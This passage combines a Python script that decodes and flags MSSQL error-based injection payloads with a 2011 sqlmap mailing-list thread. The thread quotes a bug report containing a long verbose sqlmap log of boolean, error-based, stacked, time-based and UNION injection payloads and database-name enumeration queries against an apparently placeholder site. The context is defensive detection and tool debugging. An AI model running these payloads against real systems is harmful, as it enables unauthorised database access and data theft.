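        " FROM master..sysdatabases WHERE name NOT IN (SELECT TOP 0 name FROM"
        " master..sysdatabases ORDER BY 1 ORDER BY name) ORDER BY 1)"
        "+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58))) AND 'trwh'='trwh"
    ),
    "fixed": (
        "SELECT TOP 1 name FROM master..sysdatabases WHERE name NOT IN"
        " (SELECT TOP 0 name FROM master..sysdatabases ORDER BY name) ORDER BY name"
    ),
    "benign": "20111",
}


def decode_char_runs(sql):
    """Rewrite each CHAR(a)+CHAR(b)+... run as the quoted literal it builds."""
    def build(match):
        codes = CHAR_CALL.findall(match.group(0))
        return "'" + "".join(chr(int(c)) for c in codes) + "'"
    return CHAR_RUN.sub(build, sql)


def triage(param_value):
    """Decode one request parameter value and collect the indicators."""
    decoded = decode_char_runs(param_value)
    markers = MARKER.findall(decoded)
    double_order_by = DOUBLE_ORDER_BY.search(decoded) is not None
    return {
        "decoded": decoded,
        "error_based_markers": markers,        # ['mur', 'ksm'] for this thread
        "convert_trick": CONVERT_INT.search(decoded) is not None,
        "double_order_by": double_order_by,
        "suspicious": bool(markers) or double_order_by,
    }


if __name__ == "__main__":
    for label, value in SAMPLES.items():
        result = triage(value)
        print(f"== {label}: suspicious={result['suspicious']} "
              f"markers={result['error_based_markers']} "
              f"double_order_by={result['double_order_by']}")
        print("   " + result["decoded"])
```

The check is deliberately narrow: it recognises the error-based pattern of this thread, so the boolean-based payload in the same log is not flagged, and a real detection rule would pair it with the burst of HTTP 500 responses the log shows (62 in under a minute).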
From: Miroslav S. <mir...@gm...> - 2011-02-09 12:40:36
|
hi David. please update to the latest commit (r3289 - committed this moment) and retry. kr

On Wed, Feb 9, 2011 at 1:24 PM, David Guimaraes <sk...@gm...> wrote:
> There is an error with SQL Server queries.. probably in queries.xml ?? The problem is these two ORDER BYs in the query sent to the server (--db, --tables, etc.). I checked it after upgrading to the latest svn revision.
>
> 20111' AND 6339=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT TOP 1 ISNULL(CAST(name AS NVARCHAR(4000)), CHAR(32)) FROM master..sysdatabases WHERE name NOT IN (SELECT TOP 0 name FROM master..sysdatabases ORDER BY 1 ORDER BY name) ORDER BY 1)+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58))) AND 'trwh'='trwh
> [Microsoft][ODBC SQL Server Driver][SQL Server]Incorrect syntax near the keyword 'ORDER'.
>
> Log:
>
> #./sqlmap.py --cookie "ASPSESSIONIDCABDBSQC=..." -u "http://www.vuln.com/path/default.asp?p=20111" -p p -v 3 --dbs --flush --batch | tee saida.txt
>
> sqlmap/0.9-dev - automatic SQL injection and database takeover tool
> http://sqlmap.sourceforge.net
>
> [*] starting at: 09:55:04
>
> [09:55:04] [DEBUG] cleaning up configuration parameters
> [09:55:04] [DEBUG] setting the HTTP timeout
> [09:55:04] [DEBUG] setting the HTTP Cookie header
> [09:55:04] [DEBUG] setting the HTTP method to GET
> [09:55:04] [DEBUG] creating HTTP requests opener object
> [09:55:04] [WARNING] the testable parameter 'p' you provided is not into the Cookie
> [09:55:04] [INFO] using '/path/sqlmap-dev/output/www.vuln.com/session' as session file
> [09:55:04] [INFO] flushing session file
> [09:55:04] [INFO] testing connection to the target url
> [09:55:05] [INFO] testing if the url is stable, wait a few seconds
> [09:55:06] [INFO] url is stable
> [09:55:06] [PAYLOAD] 20111'(''')"(''
> [09:55:07] [DEBUG] got HTTP error code: 500 (Internal Server Error)
> [09:55:07] [INFO] heuristic test shows that GET parameter 'p' might be injectable (possible DBMS: Microsoft SQL Server) > 
[09:55:07] [INFO] testing sql injection on GET parameter 'p' > [09:55:07] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' > [09:55:07] [PAYLOAD] 20111) AND 4197=5111 AND (1965=1965 > [09:55:08] [DEBUG] setting match ratio for current parameter to 0.952 > [09:55:08] [PAYLOAD] 20111) AND 4255=4255 AND (6152=6152 > [09:55:08] [PAYLOAD] 20111 AND 3013=569 > [09:55:08] [DEBUG] setting match ratio for current parameter to 0.952 > [09:55:08] [PAYLOAD] 20111 AND 4255=4255 > [09:55:09] [PAYLOAD] 20111') AND 513=8635 AND ('kiwS'='kiwS > [09:55:09] [DEBUG] got HTTP error code: 500 (Internal Server Error) > [09:55:09] [PAYLOAD] 20111') AND 4255=4255 AND ('ofle'='ofle > [09:55:09] [DEBUG] got HTTP error code: 500 (Internal Server Error) > [09:55:09] [PAYLOAD] 20111' AND 8628=4076 AND 'Jbgn'='Jbgn > [09:55:10] [DEBUG] setting match ratio for current parameter to 0.952 > [09:55:10] [PAYLOAD] 20111' AND 4255=4255 AND 'obQa'='obQa > [09:55:10] [PAYLOAD] 20111' AND 9514=9437 AND 'ZUZG'='ZUZG > [09:55:11] [INFO] GET parameter 'p' is 'AND boolean-based blind - WHERE or > HAVING clause' injectable > [09:55:11] [DEBUG] skipping test 'AND boolean-based blind - WHERE or HAVING > clause (Generic comment)' because the payload for boolean-based blind has > already been identified > [09:55:11] [DEBUG] skipping test 'OR boolean-based blind - WHERE or HAVING > clause' because the payload for boolean-based blind has already been > identified > [09:55:11] [DEBUG] skipping test 'OR boolean-based blind - WHERE or HAVING > clause (Generic comment)' because the payload for boolean-based blind has > already been identified > [09:55:11] [DEBUG] skipping test 'Generic boolean-based blind - Parameter > replace' because the payload for boolean-based blind has already been > identified > [09:55:11] [DEBUG] skipping test 'Generic boolean-based blind - Parameter > replace (original value)' because the payload for boolean-based blind has > already been identified > [09:55:11] [DEBUG] 
skipping test 'Generic boolean-based blind - GROUP BY and > ORDER BY clauses' because the payload for boolean-based blind has already > been identified > [09:55:11] [DEBUG] skipping test 'Generic boolean-based blind - GROUP BY and > ORDER BY clauses (original value)' because the payload for boolean-based > blind has already been identified > [09:55:11] [DEBUG] skipping test 'Microsoft SQL Server/Sybase boolean-based > blind - Parameter replace (original value)' because the payload for > boolean-based blind has already been identified > [09:55:11] [DEBUG] skipping test 'Microsoft SQL Server/Sybase boolean-based > blind - ORDER BY clause' because the payload for boolean-based blind has > already been identified > [09:55:11] [DEBUG] skipping test 'Microsoft SQL Server/Sybase stacked > conditional-error blind queries' because the payload for boolean-based blind > has already been identified > [09:55:11] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - > WHERE or HAVING clause' > [09:55:11] [PAYLOAD] 20111' AND > 87=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT > (CASE WHEN (87=87) THEN CHAR(49) ELSE CHAR(48) > END))+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58))) AND 'wAZl'='wAZl > [09:55:11] [DEBUG] got HTTP error code: 500 (Internal Server Error) > [09:55:11] [INFO] GET parameter 'p' is 'Microsoft SQL Server/Sybase AND > error-based - WHERE or HAVING clause' injectable > [09:55:11] [DEBUG] skipping test 'Microsoft SQL Server/Sybase AND > error-based - WHERE or HAVING clause (IN)' because the payload for > error-based has already been identified > [09:55:11] [DEBUG] skipping test 'Microsoft SQL Server/Sybase OR error-based > - WHERE or HAVING clause' because the payload for error-based has already > been identified > [09:55:11] [DEBUG] skipping test 'Microsoft SQL Server/Sybase OR error-based > - WHERE or HAVING clause (IN)' because the payload for error-based has > already been identified > [09:55:11] [DEBUG] skipping test 
'Microsoft SQL Server/Sybase error-based - > Parameter replace' because the payload for error-based has already been > identified > [09:55:11] [DEBUG] skipping test 'Microsoft SQL Server/Sybase error-based - > ORDER BY clause' because the payload for error-based has already been > identified > [09:55:11] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries' > [09:55:11] [PAYLOAD] 20111'; WAITFOR DELAY '0:0:5';-- AND 'Hlos'='Hlos > [09:55:17] [PAYLOAD] 20111'; WAITFOR DELAY '0:0:5';-- AND 'Hlos'='Hlos > [09:55:22] [INFO] GET parameter 'p' is 'Microsoft SQL Server/Sybase stacked > queries' injectable > [09:55:22] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind' > [09:55:22] [PAYLOAD] 20111' WAITFOR DELAY '0:0:5'-- AND 'YKua'='YKua > [09:55:27] [PAYLOAD] 20111' WAITFOR DELAY '0:0:5'-- AND 'YKua'='YKua > [09:55:33] [INFO] GET parameter 'p' is 'Microsoft SQL Server/Sybase > time-based blind' injectable > [09:55:33] [DEBUG] skipping test 'Microsoft SQL Server/Sybase AND time-based > blind (heavy query)' because the payload for AND/OR time-based blind has > already been identified > [09:55:33] [DEBUG] skipping test 'Microsoft SQL Server/Sybase AND time-based > blind (heavy query - comment)' because the payload for AND/OR time-based > blind has already been identified > [09:55:33] [DEBUG] skipping test 'Microsoft SQL Server/Sybase OR time-based > blind (heavy query)' because the payload for AND/OR time-based blind has > already been identified > [09:55:33] [DEBUG] skipping test 'AND boolean-based blind - WHERE or HAVING > clause (MySQL comment)' because the payload for boolean-based blind has > already been identified > [09:55:33] [DEBUG] skipping test 'OR boolean-based blind - WHERE or HAVING > clause (MySQL comment)' because the payload for boolean-based blind has > already been identified > [09:55:33] [DEBUG] skipping test 'MySQL boolean-based blind - WHERE or > HAVING clause (RLIKE)' because the payload for boolean-based blind has > already been 
identified > [09:55:33] [DEBUG] skipping test 'MySQL boolean-based blind - Parameter > replace (MAKE_SET - original value)' because the payload for boolean-based > blind has already been identified > [09:55:33] [DEBUG] skipping test 'MySQL boolean-based blind - Parameter > replace (ELT - original value)' because the payload for boolean-based blind > has already been identified > [09:55:33] [DEBUG] skipping test 'MySQL >= 5.0 boolean-based blind - > Parameter replace (original value)' because the payload for boolean-based > blind has already been identified > [09:55:33] [DEBUG] skipping test 'MySQL < 5.0 boolean-based blind - > Parameter replace (original value)' because the payload for boolean-based > blind has already been identified > [09:55:33] [DEBUG] skipping test 'Oracle boolean-based blind - Parameter > replace (original value)' because the payload for boolean-based blind has > already been identified > [09:55:33] [DEBUG] skipping test 'MySQL >= 5.0 boolean-based blind - GROUP > BY and ORDER BY clauses' because the payload for boolean-based blind has > already been identified > [09:55:33] [DEBUG] skipping test 'MySQL < 5.0 boolean-based blind - GROUP BY > and ORDER BY clauses' because the payload for boolean-based blind has > already been identified > [09:55:33] [DEBUG] skipping test 'Oracle boolean-based blind - GROUP BY and > ORDER BY clauses' because the payload for boolean-based blind has already > been identified > [09:55:33] [DEBUG] skipping test 'MySQL stacked conditional-error blind > queries' because the payload for boolean-based blind has already been > identified > [09:55:33] [DEBUG] skipping test 'PostgreSQL stacked conditional-error blind > queries' because the payload for boolean-based blind has already been > identified > [09:55:33] [DEBUG] skipping test 'MySQL >= 5.0 AND error-based - WHERE or > HAVING clause' because the payload for error-based has already been > identified > [09:55:33] [DEBUG] skipping test 'PostgreSQL AND error-based - 
WHERE or > HAVING clause' because the payload for error-based has already been > identified > [09:55:33] [DEBUG] skipping test 'Oracle AND error-based - WHERE or HAVING > clause (XMLType)' because the payload for error-based has already been > identified > [09:55:33] [DEBUG] skipping test 'Oracle AND error-based - WHERE or HAVING > clause (utl_inaddr.get_host_address)' because the payload for error-based > has already been identified > [09:55:33] [DEBUG] skipping test 'Oracle AND error-based - WHERE or HAVING > clause (ctxsys.drithsx.sn)' because the payload for error-based has already > been identified > [09:55:33] [DEBUG] skipping test 'Firebird AND error-based - WHERE or HAVING > clause' because the payload for error-based has already been identified > [09:55:33] [DEBUG] skipping test 'MySQL >= 5.0 OR error-based - WHERE or > HAVING clause' because the payload for error-based has already been > identified > [09:55:33] [DEBUG] skipping test 'MySQL OR error-based - WHERE or HAVING > clause' because the payload for error-based has already been identified > [09:55:33] [DEBUG] skipping test 'PostgreSQL OR error-based - WHERE or > HAVING clause' because the payload for error-based has already been > identified > [09:55:33] [DEBUG] skipping test 'Oracle OR error-based - WHERE or HAVING > clause (XMLType)' because the payload for error-based has already been > identified > [09:55:33] [DEBUG] skipping test 'Oracle OR error-based - WHERE or HAVING > clause (utl_inaddr.get_host_address)' because the payload for error-based > has already been identified > [09:55:33] [DEBUG] skipping test 'Oracle OR error-based - WHERE or HAVING > clause (ctxsys.drithsx.sn)' because the payload for error-based has already > been identified > [09:55:33] [DEBUG] skipping test 'Firebird OR error-based - WHERE or HAVING > clause' because the payload for error-based has already been identified > [09:55:33] [DEBUG] skipping test 'MySQL >= 5.0 error-based - Parameter > replace' because the payload 
for error-based has already been identified > [09:55:33] [DEBUG] skipping test 'PostgreSQL error-based - Parameter > replace' because the payload for error-based has already been identified > [09:55:33] [DEBUG] skipping test 'Oracle error-based - Parameter replace' > because the payload for error-based has already been identified > [09:55:33] [DEBUG] skipping test 'Firebird error-based - Parameter replace' > because the payload for error-based has already been identified > [09:55:33] [DEBUG] skipping test 'MySQL >= 5.0 error-based - GROUP BY and > ORDER BY clauses' because the payload for error-based has already been > identified > [09:55:33] [DEBUG] skipping test 'PostgreSQL error-based - GROUP BY and > ORDER BY clauses' because the payload for error-based has already been > identified > [09:55:33] [DEBUG] skipping test 'Oracle error-based - GROUP BY and ORDER BY > clauses' because the payload for error-based has already been identified > [09:55:33] [DEBUG] skipping test 'MySQL > 5.0.11 stacked queries' because > the payload for stacked queries has already been identified > [09:55:33] [DEBUG] skipping test 'MySQL < 5.0.12 stacked queries (heavy > query)' because the payload for stacked queries has already been identified > [09:55:33] [DEBUG] skipping test 'PostgreSQL > 8.1 stacked queries' because > the payload for stacked queries has already been identified > [09:55:33] [DEBUG] skipping test 'PostgreSQL stacked queries (heavy query)' > because the payload for stacked queries has already been identified > [09:55:33] [DEBUG] skipping test 'PostgreSQL < 8.2 stacked queries (Glibc)' > because the payload for stacked queries has already been identified > [09:55:33] [DEBUG] skipping test 'Oracle stacked queries > (DBMS_PIPE.RECEIVE_MESSAGE)' because the payload for stacked queries has > already been identified > [09:55:33] [DEBUG] skipping test 'Oracle stacked queries (heavy query)' > because the payload for stacked queries has already been identified > [09:55:33] 
[DEBUG] skipping test 'Oracle stacked queries (DBMS_LOCK.SLEEP)' > because the payload for stacked queries has already been identified > [09:55:33] [DEBUG] skipping test 'Oracle stacked queries (USER_LOCK.SLEEP)' > because the payload for stacked queries has already been identified > [09:55:33] [DEBUG] skipping test 'SQLite > 2.0 stacked queries (heavy > query)' because the payload for stacked queries has already been identified > [09:55:33] [DEBUG] skipping test 'Firebird stacked queries (heavy query)' > because the payload for stacked queries has already been identified > [09:55:33] [DEBUG] skipping test 'MySQL > 5.0.11 AND time-based blind' > because the payload for AND/OR time-based blind has already been identified > [09:55:33] [DEBUG] skipping test 'MySQL > 5.0.11 AND time-based blind > (comment)' because the payload for AND/OR time-based blind has already been > identified > [09:55:33] [DEBUG] skipping test 'MySQL < 5.0.12 AND time-based blind (heavy > query)' because the payload for AND/OR time-based blind has already been > identified > [09:55:33] [DEBUG] skipping test 'MySQL < 5.0.12 AND time-based blind (heavy > query - comment)' because the payload for AND/OR time-based blind has > already been identified > [09:55:33] [DEBUG] skipping test 'PostgreSQL > 8.1 AND time-based blind' > because the payload for AND/OR time-based blind has already been identified > [09:55:33] [DEBUG] skipping test 'PostgreSQL > 8.1 AND time-based blind > (comment)' because the payload for AND/OR time-based blind has already been > identified > [09:55:33] [DEBUG] skipping test 'PostgreSQL AND time-based blind (heavy > query)' because the payload for AND/OR time-based blind has already been > identified > [09:55:33] [DEBUG] skipping test 'PostgreSQL AND time-based blind (heavy > query - comment)' because the payload for AND/OR time-based blind has > already been identified > [09:55:33] [DEBUG] skipping test 'Oracle AND time-based blind' because the > payload for AND/OR time-based 
blind has already been identified > [09:55:33] [DEBUG] skipping test 'Oracle AND time-based blind (comment)' > because the payload for AND/OR time-based blind has already been identified > [09:55:33] [DEBUG] skipping test 'Oracle AND time-based blind (heavy query)' > because the payload for AND/OR time-based blind has already been identified > [09:55:33] [DEBUG] skipping test 'Oracle AND time-based blind (heavy query - > comment)' because the payload for AND/OR time-based blind has already been > identified > [09:55:33] [DEBUG] skipping test 'SQLite > 2.0 AND time-based blind (heavy > query)' because the payload for AND/OR time-based blind has already been > identified > [09:55:33] [DEBUG] skipping test 'SQLite > 2.0 AND time-based blind (heavy > query - comment)' because the payload for AND/OR time-based blind has > already been identified > [09:55:33] [DEBUG] skipping test 'Firebird AND time-based blind (heavy > query)' because the payload for AND/OR time-based blind has already been > identified > [09:55:33] [DEBUG] skipping test 'Firebird AND time-based blind (heavy query > - comment)' because the payload for AND/OR time-based blind has already been > identified > [09:55:33] [DEBUG] skipping test 'MySQL > 5.0.11 OR time-based blind' > because the payload for AND/OR time-based blind has already been identified > [09:55:33] [DEBUG] skipping test 'MySQL < 5.0.12 OR time-based blind (heavy > query)' because the payload for AND/OR time-based blind has already been > identified > [09:55:33] [DEBUG] skipping test 'PostgreSQL > 8.1 OR time-based blind' > because the payload for AND/OR time-based blind has already been identified > [09:55:33] [DEBUG] skipping test 'PostgreSQL OR time-based blind (heavy > query)' because the payload for AND/OR time-based blind has already been > identified > [09:55:33] [DEBUG] skipping test 'Oracle OR time-based blind' because the > payload for AND/OR time-based blind has already been identified > [09:55:33] [DEBUG] skipping test 'Oracle 
OR time-based blind (heavy query)' > because the payload for AND/OR time-based blind has already been identified > [09:55:33] [DEBUG] skipping test 'SQLite > 2.0 OR time-based blind (heavy > query)' because the payload for AND/OR time-based blind has already been > identified > [09:55:33] [DEBUG] skipping test 'Firebird OR time-based blind (heavy > query)' because the payload for AND/OR time-based blind has already been > identified > [09:55:33] [DEBUG] skipping test 'MySQL UNION query (NULL) - 1 to 10 > columns' because the back-end DBMS identified is Microsoft SQL Server > [09:55:33] [DEBUG] skipping test 'MySQL UNION query (NULL) - 11 to 20 > columns' because the level is higher than the provided > [09:55:33] [DEBUG] skipping test 'MySQL UNION query (NULL) - 21 to 30 > columns' because the level is higher than the provided > [09:55:33] [DEBUG] skipping test 'MySQL UNION query (NULL) - 31 to 40 > columns' because the level is higher than the provided > [09:55:33] [DEBUG] skipping test 'MySQL UNION query (NULL) - 41 to 50 > columns' because the level is higher than the provided > [09:55:33] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns' > [09:55:33] [PAYLOAD] 20111' UNION ALL SELECT NULL-- AND 'vrjZ'='vrjZ > [09:55:34] [DEBUG] got HTTP error code: 500 (Internal Server Error) > [09:55:34] [PAYLOAD] 20111' UNION ALL SELECT NULL, NULL-- AND 'GZNB'='GZNB > [09:55:34] [DEBUG] got HTTP error code: 500 (Internal Server Error) > [09:55:34] [PAYLOAD] 20111' UNION ALL SELECT NULL, NULL, NULL-- AND > 'dLhE'='dLhE > [09:55:35] [DEBUG] got HTTP error code: 500 (Internal Server Error) > [09:55:35] [PAYLOAD] 20111' UNION ALL SELECT NULL, NULL, NULL, NULL-- AND > 'XeTw'='XeTw > [09:55:35] [DEBUG] got HTTP error code: 500 (Internal Server Error) > [09:55:35] [PAYLOAD] 20111' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL-- > AND 'trjE'='trjE > [09:55:36] [DEBUG] got HTTP error code: 500 (Internal Server Error) > [09:55:36] [PAYLOAD] 20111' UNION ALL SELECT NULL, 
NULL, NULL, NULL, NULL, > NULL-- AND 'rjRE'='rjRE > [09:55:37] [DEBUG] got HTTP error code: 500 (Internal Server Error) > [09:55:37] [PAYLOAD] 20111' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, > NULL, NULL-- AND 'vmHq'='vmHq > [09:55:37] [DEBUG] got HTTP error code: 500 (Internal Server Error) > [09:55:37] [PAYLOAD] 20111' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, > NULL, NULL, NULL-- AND 'ZBcW'='ZBcW > [09:55:37] [DEBUG] got HTTP error code: 500 (Internal Server Error) > [09:55:38] [PAYLOAD] 20111' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, > NULL, NULL, NULL, NULL-- AND 'qhhM'='qhhM > [09:55:38] [DEBUG] got HTTP error code: 500 (Internal Server Error) > [09:55:38] [PAYLOAD] 20111' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, > NULL, NULL, NULL, NULL, NULL-- AND 'OaNn'='OaNn > [09:55:38] [DEBUG] got HTTP error code: 500 (Internal Server Error) > [09:55:38] [INFO] target url appears to be UNION injectable with 3 columns > [09:55:38] [PAYLOAD] 20111' UNION ALL SELECT NULL, > CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+ISNULL(CAST(CHAR(100)+CHAR(102)+CHAR(99)+CHAR(99) > AS NVARCHAR(4000)), > CHAR(32))+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58), NULL-- AND > 'VYhx'='VYhx > [09:55:39] [DEBUG] got HTTP error code: 500 (Internal Server Error) > [09:55:39] [PAYLOAD] 20111' UNION ALL SELECT NULL, NULL, > CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+ISNULL(CAST(CHAR(102)+CHAR(86)+CHAR(76)+CHAR(122) > AS NVARCHAR(4000)), > CHAR(32))+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58)-- AND 'TyzA'='TyzA > [09:55:39] [DEBUG] got HTTP error code: 500 (Internal Server Error) > [09:55:39] [PAYLOAD] 20111' UNION ALL SELECT > CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+ISNULL(CAST(CHAR(116)+CHAR(101)+CHAR(83)+CHAR(98) > AS NVARCHAR(4000)), > CHAR(32))+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58), NULL, NULL-- AND > 'bKpM'='bKpM > [09:55:40] [DEBUG] got HTTP error code: 500 (Internal Server Error) > [09:55:40] [PAYLOAD] -8546' UNION ALL SELECT NULL, 
NULL, > CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+ISNULL(CAST(CHAR(76)+CHAR(119)+CHAR(88)+CHAR(66) > AS NVARCHAR(4000)), > CHAR(32))+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58)-- AND 'HwBz'='HwBz > [09:55:40] [DEBUG] got HTTP error code: 500 (Internal Server Error) > [09:55:40] [PAYLOAD] -2422' UNION ALL SELECT > CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+ISNULL(CAST(CHAR(106)+CHAR(68)+CHAR(90)+CHAR(75) > AS NVARCHAR(4000)), > CHAR(32))+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58), NULL, NULL-- AND > 'hiSw'='hiSw > [09:55:41] [DEBUG] got HTTP error code: 500 (Internal Server Error) > [09:55:41] [PAYLOAD] -9676' UNION ALL SELECT NULL, > CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+ISNULL(CAST(CHAR(111)+CHAR(120)+CHAR(102)+CHAR(77) > AS NVARCHAR(4000)), > CHAR(32))+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58), NULL-- AND > 'FIBp'='FIBp > [09:55:43] [DEBUG] got HTTP error code: 500 (Internal Server Error) > [09:55:43] [DEBUG] skipping test 'Generic UNION query (NULL) - 11 to 20 > columns' because the level is higher than the provided > [09:55:43] [DEBUG] skipping test 'Generic UNION query (NULL) - 21 to 30 > columns' because the level is higher than the provided > [09:55:43] [DEBUG] skipping test 'Generic UNION query (NULL) - 31 to 40 > columns' because the level is higher than the provided > [09:55:43] [DEBUG] skipping test 'Generic UNION query (NULL) - 41 to 50 > columns' because the level is higher than the provided > [09:55:43] [INFO] GET parameter 'p' is vulnerable. Do you want to keep > testing the others? 
[y/N] N
> [09:55:43] [DEBUG] used the default behaviour, running in batch mode
> sqlmap identified the following injection points with a total of 30 HTTP(s) requests:
> ---
> Place: GET
> Parameter: p
> Type: boolean-based blind
> Title: AND boolean-based blind - WHERE or HAVING clause
> Payload: p=20111' AND 4255=4255 AND 'obQa'='obQa
>
> Type: error-based
> Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
> Payload: p=20111' AND 87=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT (CASE WHEN (87=87) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58))) AND 'wAZl'='wAZl
>
> Type: stacked queries
> Title: Microsoft SQL Server/Sybase stacked queries
> Payload: p=20111'; WAITFOR DELAY '0:0:5';-- AND 'Hlos'='Hlos
>
> Type: AND/OR time-based blind
> Title: Microsoft SQL Server/Sybase time-based blind
> Payload: p=20111' WAITFOR DELAY '0:0:5'-- AND 'YKua'='YKua
> ---
>
> [09:55:43] [INFO] testing Microsoft SQL Server
> [09:55:43] [PAYLOAD] 20111' AND 876=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT (CASE WHEN (BINARY_CHECKSUM(76)=BINARY_CHECKSUM(76)) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58))) AND 'XHDB'='XHDB
> [09:55:44] [DEBUG] got HTTP error code: 500 (Internal Server Error)
> [09:55:44] [INFO] retrieved: 1
> [09:55:44] [DEBUG] performed 1 queries in 0 seconds
> [09:55:44] [INFO] confirming Microsoft SQL Server
> [09:55:44] [PAYLOAD] 20111' AND 2557=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT (CASE WHEN (HOST_NAME()=HOST_NAME()) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58))) AND 'eONH'='eONH
> [09:55:44] [DEBUG] got HTTP error code: 500 (Internal Server Error)
> [09:55:44] [INFO] retrieved: 1
> [09:55:44] [DEBUG] performed 1 queries in 0 seconds
> [09:55:44] [PAYLOAD] 20111' AND 1181=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT (CASE WHEN (XACT_STATE()=XACT_STATE()) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58))) AND 'erPM'='erPM
> [09:55:44] [DEBUG] got HTTP error code: 500 (Internal Server Error)
> [09:55:44] [INFO] retrieved: 1
> [09:55:44] [DEBUG] performed 1 queries in 0 seconds
> [09:55:44] [PAYLOAD] 20111' AND 2691=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT (CASE WHEN (SYSDATETIME()=SYSDATETIME()) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58))) AND 'ZLNT'='ZLNT
> [09:55:45] [DEBUG] got HTTP error code: 500 (Internal Server Error)
> [09:55:45] [INFO] retrieved: 1
> [09:55:45] [DEBUG] performed 1 queries in 0 seconds
> [09:55:45] [INFO] the back-end DBMS is Microsoft SQL Server
> web server operating system: Windows Vista
> web application technology: ASP.NET, Microsoft IIS 7.0
> back-end DBMS: Microsoft SQL Server 2008
> [09:55:45] [INFO] fetching database names
> [09:55:45] [PAYLOAD] 20111' AND 7776=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT ISNULL(CAST(COUNT(name) AS NVARCHAR(4000)), CHAR(32)) FROM master..sysdatabases)+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58))) AND 'IIWR'='IIWR
> [09:55:45] [DEBUG] got HTTP error code: 500 (Internal Server Error)
> [09:55:45] [INFO] the SQL query used returns 37 entries
> [09:55:45] [PAYLOAD] 20111' AND 6339=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT TOP 1 ISNULL(CAST(name AS NVARCHAR(4000)), CHAR(32)) FROM master..sysdatabases WHERE name NOT IN (SELECT TOP 0 name FROM master..sysdatabases ORDER BY 1 ORDER BY name) ORDER BY 1)+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58))) AND 'trwh'='trwh
> [09:55:46] [DEBUG] got HTTP error code: 500 (Internal Server Error)
> [09:55:46] [PAYLOAD] 20111' AND 5378=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT TOP 1
ISNULL(CAST(name AS NVARCHAR(4000)), CHAR(32)) FROM > master..sysdatabases WHERE name NOT IN (SELECT TOP 1 name FROM > master..sysdatabases ORDER BY 1 ORDER BY name) ORDER BY > 1)+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58))) AND 'nEZn'='nEZn > [09:55:46] [DEBUG] got HTTP error code: 500 (Internal Server Error) > [09:55:46] [PAYLOAD] 20111' AND > 3153=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT > TOP 1 ISNULL(CAST(name AS NVARCHAR(4000)), CHAR(32)) FROM > master..sysdatabases WHERE name NOT IN (SELECT TOP 2 name FROM > master..sysdatabases ORDER BY 1 ORDER BY name) ORDER BY > 1)+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58))) AND 'PAcn'='PAcn > [09:55:47] [DEBUG] got HTTP error code: 500 (Internal Server Error) > [09:55:47] [PAYLOAD] 20111' AND > 2020=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT > TOP 1 ISNULL(CAST(name AS NVARCHAR(4000)), CHAR(32)) FROM > master..sysdatabases WHERE name NOT IN (SELECT TOP 3 name FROM > master..sysdatabases ORDER BY 1 ORDER BY name) ORDER BY > 1)+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58))) 